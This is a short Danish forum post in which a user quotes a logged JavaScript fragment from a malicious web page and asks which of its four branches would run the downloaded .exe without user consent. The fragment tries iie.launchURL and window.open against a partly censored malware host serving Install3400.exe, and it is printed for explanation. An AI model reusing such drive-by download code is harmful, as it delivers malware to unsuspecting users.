Et hurtigt spørgsmål om IE/FF/Virus.
Fra : Stig Johansen

Dato : 22-02-08 08:56

Hej alle.

Jeg er ved at lave en lille beskrivelse til min kammerat om _hvordan_ virus
kommer ind, og jeg kender desværre ikke IE så godt, så:

Undervejs har jeg logget følgende js(kortet lid aht længde af indlæg +
censur=XXXXX):
------- scriptstump start
if (is_IE) {
if (is_XP_SP2)
try
iie.launchURL("http://xscanner.malXXXXX.com/a/Install3400.exe");
catch(e)
window.open("http://xscanner.malXXXXX.com/a/Install3400.exe","new",
"width=580,height=180,left="+w+",top="+h);
else
window.open("http://xscanner.malXXXXX.com/a/Install3400.exe","new",
"width=580,height=180,left="+w+",top="+h);
else
window.open("http://xscanner.malXXXXX.com/a/Install3400.exe", "_blank",
"width=580,height=180,left="+w+",top="+h);
------- scriptstump slut

Alle 4 forsøger(?) at åbne .exe filen, de første 3 i IE, den sidste i
resten.
Det er selvfølgelig virus/malware, se evt rapporten her:
<http://www.virustotal.com/analisis/594a062f58a1e7699aed876d039f96f1>

Det korte spørgmål er:
I hvilke af disse 4 tilfælde bliver .exe filen kørt *uden* brugeren trykker
Ok/Run eller lign?

For en god ordens skyld vil jeg lige nævne, at jeg har *ingen* maskiner,
hvor jeg hverken kan eller vil afprøve 'dyret', deraf mit ?.

Stig Johansen